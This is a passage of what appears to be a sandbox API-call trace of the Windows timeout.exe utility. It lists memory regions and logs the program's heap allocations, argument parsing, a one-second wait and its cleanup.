filename = "\\Windows\\System32\\en-US\\timeout.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\timeout.exe.mui")
Region:
id = 1635
start_va = 0xd0000
end_va = 0xd0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 1636
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 1637
start_va = 0x1c30000
end_va = 0x1efefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Thread:
id = 84
os_tid = 0xc0c
[0372.987] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fdb0 | out: lpSystemTimeAsFileTime=0x24fdb0*(dwLowDateTime=0xf6618e80, dwHighDateTime=0x1dab598))
[0372.987] GetCurrentProcessId () returned 0xc10
[0372.987] GetCurrentThreadId () returned 0xc0c
[0372.987] GetTickCount () returned 0x1425824
[0372.987] QueryPerformanceCounter (in: lpPerformanceCount=0x24fdb8 | out: lpPerformanceCount=0x24fdb8*=2125368437262) returned 1
[0372.988] GetModuleHandleW (lpModuleName=0x0) returned 0xff740000
[0372.988] __set_app_type (_Type=0x1)
[0372.988] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff746888) returned 0x0
[0372.991] __wgetmainargs (in: _Argc=0xff748140, _Argv=0xff748150, _Env=0xff748148, _DoWildCard=0, _StartInfo=0xff74815c | out: _Argc=0xff748140, _Argv=0xff748150, _Env=0xff748148) returned 0
[0372.992] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0372.995] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0372.995] SetLastError (dwErrCode=0x0)
[0372.996] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x2, Condition=0x3) returned 0x8000000000000018
[0372.996] VerSetConditionMask (ConditionMask=0x8000000000000018, TypeMask=0x1, Condition=0x3) returned 0x800000000000001b
[0372.996] VerSetConditionMask (ConditionMask=0x800000000000001b, TypeMask=0x20, Condition=0x3) returned 0x800000000001801b
[0372.996] VerifyVersionInfoW (in: lpVersionInformation=0x24f4d0, dwTypeMask=0x3, dwlConditionMask=0x800000000001801b | out: lpVersionInformation=0x24f4d0) returned 1
[0372.996] GetProcessHeap () returned 0x410000
[0372.996] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x18) returned 0x4291e0
[0372.996] lstrlenW (lpString="") returned 0
[0372.997] GetProcessHeap () returned 0x410000
[0372.997] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x2) returned 0x429200
[0372.997] GetProcessHeap () returned 0x410000
[0372.997] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x4278e0
[0372.997] GetProcessHeap () returned 0x410000
[0372.997] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x18) returned 0x429220
[0372.997] GetProcessHeap () returned 0x410000
[0372.997] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427910
[0372.997] GetProcessHeap () returned 0x410000
[0372.997] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427940
[0372.997] GetProcessHeap () returned 0x410000
[0372.997] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427970
[0372.997] GetProcessHeap () returned 0x410000
[0372.997] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x4279a0
[0372.997] GetProcessHeap () returned 0x410000
[0372.998] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x18) returned 0x429240
[0372.998] GetProcessHeap () returned 0x410000
[0372.998] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x4279d0
[0372.998] GetProcessHeap () returned 0x410000
[0372.998] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427a00
[0372.998] GetProcessHeap () returned 0x410000
[0372.998] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427a30
[0372.998] GetProcessHeap () returned 0x410000
[0372.998] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427a60
[0372.998] GetProcessHeap () returned 0x410000
[0372.998] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x18) returned 0x429260
[0372.998] GetProcessHeap () returned 0x410000
[0372.998] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427a90
[0372.998] GetProcessHeap () returned 0x410000
[0372.998] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427ac0
[0372.998] GetProcessHeap () returned 0x410000
[0372.998] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427af0
[0372.998] GetProcessHeap () returned 0x410000
[0372.999] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427b20
[0372.999] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0372.999] SetLastError (dwErrCode=0x0)
[0372.999] GetProcessHeap () returned 0x410000
[0372.999] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427b50
[0372.999] GetProcessHeap () returned 0x410000
[0372.999] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427b80
[0372.999] GetProcessHeap () returned 0x410000
[0372.999] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427bb0
[0373.000] GetProcessHeap () returned 0x410000
[0373.000] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427be0
[0373.000] GetProcessHeap () returned 0x410000
[0373.000] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427c10
[0373.000] GetProcessHeap () returned 0x410000
[0373.000] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x18) returned 0x42b530
[0373.000] _memicmp (_Buf1=0x42b530, _Buf2=0xff741398, _Size=0x7) returned 0
[0373.000] GetProcessHeap () returned 0x410000
[0373.000] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x208) returned 0x42b550
[0373.000] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x42b550, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\timeout.exe" (normalized: "c:\\windows\\system32\\timeout.exe")) returned 0x1f
[0373.000] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\system32\\timeout.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x76c
[0373.008] GetProcessHeap () returned 0x410000
[0373.008] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x776) returned 0x42b760
[0373.008] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\system32\\timeout.exe", dwHandle=0x0, dwLen=0x776, lpData=0x42b760 | out: lpData=0x42b760) returned 1
[0373.009] VerQueryValueW (in: pBlock=0x42b760, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24f5b8, puLen=0x24f620 | out: lplpBuffer=0x24f5b8*=0x42bb10, puLen=0x24f620) returned 1
[0373.014] _memicmp (_Buf1=0x42b530, _Buf2=0xff741398, _Size=0x7) returned 0
[0373.014] _vsnwprintf (in: _Buffer=0x42b550, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x24f598 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0373.014] VerQueryValueW (in: pBlock=0x42b760, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x24f628, puLen=0x24f618 | out: lplpBuffer=0x24f628*=0x42b940, puLen=0x24f618) returned 1
[0373.014] lstrlenW (lpString="timeout.exe") returned 11
[0373.014] lstrlenW (lpString="timeout.exe") returned 11
[0373.014] lstrlenW (lpString=".EXE") returned 4
[0373.014] StrStrIW (lpFirst="timeout.exe", lpSrch=".EXE") returned=".exe"
[0373.018] lstrlenW (lpString="timeout.exe") returned 11
[0373.018] lstrlenW (lpString=".EXE") returned 4
[0373.018] _memicmp (_Buf1=0x42b530, _Buf2=0xff741398, _Size=0x7) returned 0
[0373.018] lstrlenW (lpString="timeout") returned 7
[0373.018] GetProcessHeap () returned 0x410000
[0373.018] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427c70
[0373.018] GetProcessHeap () returned 0x410000
[0373.018] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427ca0
[0373.019] GetProcessHeap () returned 0x410000
[0373.019] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427cd0
[0373.019] GetProcessHeap () returned 0x410000
[0373.019] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427d00
[0373.019] GetProcessHeap () returned 0x410000
[0373.019] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x18) returned 0x42c250
[0373.019] _memicmp (_Buf1=0x42c250, _Buf2=0xff741398, _Size=0x7) returned 0
[0373.019] GetProcessHeap () returned 0x410000
[0373.019] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0xa0) returned 0x42c270
[0373.019] GetProcessHeap () returned 0x410000
[0373.019] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427d30
[0373.019] GetProcessHeap () returned 0x410000
[0373.019] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427d60
[0373.020] GetProcessHeap () returned 0x410000
[0373.020] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427d90
[0373.020] GetProcessHeap () returned 0x410000
[0373.020] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x18) returned 0x42c320
[0373.020] _memicmp (_Buf1=0x42c320, _Buf2=0xff741398, _Size=0x7) returned 0
[0373.020] GetProcessHeap () returned 0x410000
[0373.020] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x200) returned 0x42c340
[0373.020] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x42c340, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0373.021] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0373.021] GetProcessHeap () returned 0x410000
[0373.021] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x30) returned 0x427150
[0373.021] _vsnwprintf (in: _Buffer=0x42c270, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x24f598 | out: _Buffer="Type \"TIMEOUT /?\" for usage.") returned 28
[0373.021] GetProcessHeap () returned 0x410000
[0373.021] GetProcessHeap () returned 0x410000
[0373.021] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x42b760) returned 1
[0373.022] GetProcessHeap () returned 0x410000
[0373.022] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x42b760) returned 0x776
[0373.022] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42b760 | out: hHeap=0x410000) returned 1
[0373.023] SetLastError (dwErrCode=0x0)
[0373.023] GetThreadLocale () returned 0x409
[0373.023] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0373.115] lstrlenW (lpString="?") returned 1
[0373.115] GetThreadLocale () returned 0x409
[0373.115] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0373.115] GetThreadLocale () returned 0x409
[0373.115] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0373.115] lstrlenW (lpString="nobreak") returned 7
[0373.115] SetLastError (dwErrCode=0x0)
[0373.115] SetLastError (dwErrCode=0x0)
[0373.115] lstrlenW (lpString="1") returned 1
[0373.116] SetLastError (dwErrCode=0x490)
[0373.116] SetLastError (dwErrCode=0x0)
[0373.116] lstrlenW (lpString="1") returned 1
[0373.116] StrChrIW (lpStart="1", wMatch=0x3a) returned 0x0
[0373.116] SetLastError (dwErrCode=0x490)
[0373.116] SetLastError (dwErrCode=0x0)
[0373.116] GetProcessHeap () returned 0x410000
[0373.116] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x18) returned 0x42b760
[0373.116] _memicmp (_Buf1=0x42b760, _Buf2=0xff741398, _Size=0x7) returned 0
[0373.116] lstrlenW (lpString="1") returned 1
[0373.116] GetProcessHeap () returned 0x410000
[0373.116] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x4) returned 0x42b780
[0373.116] lstrlenW (lpString="1") returned 1
[0373.116] lstrlenW (lpString=" \x09") returned 2
[0373.117] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0
[0373.117] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0
[0373.117] GetLastError () returned 0x0
[0373.117] lstrlenW (lpString="1") returned 1
[0373.118] lstrlenW (lpString="1") returned 1
[0373.118] SetLastError (dwErrCode=0x0)
[0373.118] _errno () returned 0x134bb0
[0373.118] wcstol (in: _String="1", _EndPtr=0x24f8f8, _Radix=10 | out: _EndPtr=0x24f8f8*="") returned 1
[0373.118] lstrlenW (lpString="") returned 0
[0373.118] _errno () returned 0x134bb0
[0373.118] time (in: timer=0x24f8e0 | out: timer=0x24f8e0) returned 0x665d8db1
[0373.118] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0373.118] GetFileType (hFile=0x3) returned 0x2
[0373.120] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x24f8ec | out: lpMode=0x24f8ec) returned 1
[0373.121] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0373.121] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x24f8e8 | out: lpMode=0x24f8e8) returned 1
[0373.122] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a1) returned 1
[0373.122] GetNumberOfConsoleInputEvents (in: hConsoleInput=0x3, lpNumberOfEvents=0x24f8d4 | out: lpNumberOfEvents=0x24f8d4) returned 1
[0373.123] FlushConsoleInputBuffer (hConsoleInput=0x3) returned 1
[0373.124] GetProcessHeap () returned 0x410000
[0373.124] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427dc0
[0373.124] _memicmp (_Buf1=0x42c320, _Buf2=0xff741398, _Size=0x7) returned 0
[0373.124] LoadStringW (in: hInstance=0x0, uID=0x98, lpBuffer=0x42c340, cchBufferMax=256 | out: lpBuffer="\nWaiting for %*lu") returned 0x11
[0373.124] lstrlenW (lpString="\nWaiting for %*lu") returned 17
[0373.125] GetProcessHeap () returned 0x410000
[0373.125] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x24) returned 0x427df0
[0373.125] _vsnwprintf (in: _Buffer=0x24f960, _BufferCount=0xfd, _Format="\nWaiting for %*lu", _ArgList=0x24f8b8 | out: _Buffer="\nWaiting for 1") returned 14
[0373.125] __iob_func () returned 0x7feff862a80
[0373.125] _fileno (_File=0x7feff862ab0) returned 1
[0373.125] _errno () returned 0x134bb0
[0373.125] _get_osfhandle (_FileHandle=1) returned 0x7
[0373.125] _errno () returned 0x134bb0
[0373.125] GetFileType (hFile=0x7) returned 0x2
[0373.126] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0373.126] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f830 | out: lpMode=0x24f830) returned 1
[0373.127] __iob_func () returned 0x7feff862a80
[0373.127] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0373.127] lstrlenW (lpString="\nWaiting for 1") returned 14
[0373.127] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x24f960*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0x24f8a0, lpReserved=0x0 | out: lpBuffer=0x24f960*, lpNumberOfCharsWritten=0x24f8a0*=0xe) returned 1
[0373.129] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0373.129] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x24f928 | out: lpConsoleScreenBufferInfo=0x24f928) returned 1
[0373.129] GetProcessHeap () returned 0x410000
[0373.130] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427e20
[0373.130] _memicmp (_Buf1=0x42c320, _Buf2=0xff741398, _Size=0x7) returned 0
[0373.130] LoadStringW (in: hInstance=0x0, uID=0xa0, lpBuffer=0x42c340, cchBufferMax=256 | out: lpBuffer=" seconds, press a key to continue ...") returned 0x25
[0373.130] lstrlenW (lpString=" seconds, press a key to continue ...") returned 37
[0373.130] GetProcessHeap () returned 0x410000
[0373.130] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x4c) returned 0x42b7a0
[0373.130] __iob_func () returned 0x7feff862a80
[0373.130] _fileno (_File=0x7feff862ab0) returned 1
[0373.130] _errno () returned 0x134bb0
[0373.130] _get_osfhandle (_FileHandle=1) returned 0x7
[0373.130] _errno () returned 0x134bb0
[0373.130] GetFileType (hFile=0x7) returned 0x2
[0373.131] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0373.131] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f830 | out: lpMode=0x24f830) returned 1
[0373.132] __iob_func () returned 0x7feff862a80
[0373.132] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0373.132] lstrlenW (lpString=" seconds, press a key to continue ...") returned 37
[0373.132] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x42b7a0*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0x24f8a0, lpReserved=0x0 | out: lpBuffer=0x42b7a0*, lpNumberOfCharsWritten=0x24f8a0*=0x25) returned 1
[0373.133] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x24f900, nLength=0x2, lpNumberOfEventsRead=0x24f8d4 | out: lpBuffer=0x24f900, lpNumberOfEventsRead=0x24f8d4) returned 1
[0373.134] time (in: timer=0x24f8e0 | out: timer=0x24f8e0) returned 0x665d8db1
[0373.134] Sleep (dwMilliseconds=0x64)
[0373.375] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x24f900, nLength=0x2, lpNumberOfEventsRead=0x24f8d4 | out: lpBuffer=0x24f900, lpNumberOfEventsRead=0x24f8d4) returned 1
[0373.376] time (in: timer=0x24f8e0 | out: timer=0x24f8e0) returned 0x665d8db1
[0373.376] Sleep (dwMilliseconds=0x64)
[0373.477] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x24f900, nLength=0x2, lpNumberOfEventsRead=0x24f8d4 | out: lpBuffer=0x24f900, lpNumberOfEventsRead=0x24f8d4) returned 1
[0373.478] time (in: timer=0x24f8e0 | out: timer=0x24f8e0) returned 0x665d8db1
[0373.478] Sleep (dwMilliseconds=0x64)
[0373.589] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x24f900, nLength=0x2, lpNumberOfEventsRead=0x24f8d4 | out: lpBuffer=0x24f900, lpNumberOfEventsRead=0x24f8d4) returned 1
[0373.589] time (in: timer=0x24f8e0 | out: timer=0x24f8e0) returned 0x665d8db2
[0373.590] _vsnwprintf (in: _Buffer=0x24f960, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x24f8b8 | out: _Buffer="\x080") returned 2
[0373.590] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x2000d) returned 1
[0373.590] __iob_func () returned 0x7feff862a80
[0373.590] _fileno (_File=0x7feff862ab0) returned 1
[0373.590] _errno () returned 0x134bb0
[0373.590] _get_osfhandle (_FileHandle=1) returned 0x7
[0373.591] _errno () returned 0x134bb0
[0373.591] GetFileType (hFile=0x7) returned 0x2
[0373.591] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0373.591] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f830 | out: lpMode=0x24f830) returned 1
[0373.592] __iob_func () returned 0x7feff862a80
[0373.592] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0373.592] lstrlenW (lpString="\x080") returned 2
[0373.592] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x24f960*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f8a0, lpReserved=0x0 | out: lpBuffer=0x24f960*, lpNumberOfCharsWritten=0x24f8a0*=0x2) returned 1
[0373.593] Sleep (dwMilliseconds=0x64)
[0373.695] __iob_func () returned 0x7feff862a80
[0373.695] _fileno (_File=0x7feff862ab0) returned 1
[0373.695] _errno () returned 0x134bb0
[0373.696] _get_osfhandle (_FileHandle=1) returned 0x7
[0373.696] _errno () returned 0x134bb0
[0373.696] GetFileType (hFile=0x7) returned 0x2
[0373.696] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0373.696] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f830 | out: lpMode=0x24f830) returned 1
[0373.697] __iob_func () returned 0x7feff862a80
[0373.697] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0373.697] lstrlenW (lpString="\n") returned 1
[0373.697] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff741358*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x24f8a0, lpReserved=0x0 | out: lpBuffer=0xff741358*, lpNumberOfCharsWritten=0x24f8a0*=0x1) returned 1
[0373.698] GetProcessHeap () returned 0x410000
[0373.698] GetProcessHeap () returned 0x410000
[0373.698] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x42c270) returned 1
[0373.698] GetProcessHeap () returned 0x410000
[0373.698] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x42c270) returned 0xa0
[0373.699] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42c270 | out: hHeap=0x410000) returned 1
[0373.700] GetProcessHeap () returned 0x410000
[0373.700] GetProcessHeap () returned 0x410000
[0373.700] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x42c250) returned 1
[0373.700] GetProcessHeap () returned 0x410000
[0373.700] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x42c250) returned 0x18
[0373.700] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42c250 | out: hHeap=0x410000) returned 1
[0373.700] GetProcessHeap () returned 0x410000
[0373.700] GetProcessHeap () returned 0x410000
[0373.700] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427d00) returned 1
[0373.700] GetProcessHeap () returned 0x410000
[0373.700] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427d00) returned 0x20
[0373.701] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427d00 | out: hHeap=0x410000) returned 1
[0373.701] GetProcessHeap () returned 0x410000
[0373.701] GetProcessHeap () returned 0x410000
[0373.701] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x42b780) returned 1
[0373.701] GetProcessHeap () returned 0x410000
[0373.701] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x42b780) returned 0x4
[0373.702] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42b780 | out: hHeap=0x410000) returned 1
[0373.702] GetProcessHeap () returned 0x410000
[0373.702] GetProcessHeap () returned 0x410000
[0373.702] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x42b760) returned 1
[0373.702] GetProcessHeap () returned 0x410000
[0373.702] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x42b760) returned 0x18
[0373.702] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42b760 | out: hHeap=0x410000) returned 1
[0373.702] GetProcessHeap () returned 0x410000
[0373.702] GetProcessHeap () returned 0x410000
[0373.702] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427cd0) returned 1
[0373.702] GetProcessHeap () returned 0x410000
[0373.702] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427cd0) returned 0x20
[0373.703] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427cd0 | out: hHeap=0x410000) returned 1
[0373.703] GetProcessHeap () returned 0x410000
[0373.703] GetProcessHeap () returned 0x410000
[0373.703] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x42b550) returned 1
[0373.703] GetProcessHeap () returned 0x410000
[0373.703] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x42b550) returned 0x208
[0373.704] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42b550 | out: hHeap=0x410000) returned 1
[0373.704] GetProcessHeap () returned 0x410000
[0373.704] GetProcessHeap () returned 0x410000
[0373.704] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x42b530) returned 1
[0373.704] GetProcessHeap () returned 0x410000
[0373.704] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x42b530) returned 0x18
[0373.704] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42b530 | out: hHeap=0x410000) returned 1
[0373.704] GetProcessHeap () returned 0x410000
[0373.705] GetProcessHeap () returned 0x410000
[0373.705] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427c10) returned 1
[0373.705] GetProcessHeap () returned 0x410000
[0373.705] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427c10) returned 0x20
[0373.705] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427c10 | out: hHeap=0x410000) returned 1
[0373.705] GetProcessHeap () returned 0x410000
[0373.705] GetProcessHeap () returned 0x410000
[0373.706] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x42c340) returned 1
[0373.706] GetProcessHeap () returned 0x410000
[0373.706] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x42c340) returned 0x200
[0373.706] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42c340 | out: hHeap=0x410000) returned 1
[0373.706] GetProcessHeap () returned 0x410000
[0373.706] GetProcessHeap () returned 0x410000
[0373.707] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x42c320) returned 1
[0373.707] GetProcessHeap () returned 0x410000
[0373.707] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x42c320) returned 0x18
[0373.707] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42c320 | out: hHeap=0x410000) returned 1
[0373.707] GetProcessHeap () returned 0x410000
[0373.707] GetProcessHeap () returned 0x410000
[0373.707] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427b80) returned 1
[0373.707] GetProcessHeap () returned 0x410000
[0373.707] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427b80) returned 0x20
[0373.708] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427b80 | out: hHeap=0x410000) returned 1
[0373.708] GetProcessHeap () returned 0x410000
[0373.708] GetProcessHeap () returned 0x410000
[0373.709] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x429200) returned 1
[0373.709] GetProcessHeap () returned 0x410000
[0373.709] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x429200) returned 0x2
[0373.709] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x429200 | out: hHeap=0x410000) returned 1
[0373.709] GetProcessHeap () returned 0x410000
[0373.709] GetProcessHeap () returned 0x410000
[0373.709] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x4278e0) returned 1
[0373.709] GetProcessHeap () returned 0x410000
[0373.709] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x4278e0) returned 0x20
[0373.710] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4278e0 | out: hHeap=0x410000) returned 1
[0373.710] GetProcessHeap () returned 0x410000
[0373.710] GetProcessHeap () returned 0x410000
[0373.710] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427910) returned 1
[0373.710] GetProcessHeap () returned 0x410000
[0373.710] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427910) returned 0x20
[0373.711] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427910 | out: hHeap=0x410000) returned 1
[0373.711] GetProcessHeap () returned 0x410000
[0373.711] GetProcessHeap () returned 0x410000
[0373.711] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427940) returned 1
[0373.711] GetProcessHeap () returned 0x410000
[0373.711] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427940) returned 0x20
[0373.712] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427940 | out: hHeap=0x410000) returned 1
[0373.712] GetProcessHeap () returned 0x410000
[0373.712] GetProcessHeap () returned 0x410000
[0373.712] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427970) returned 1
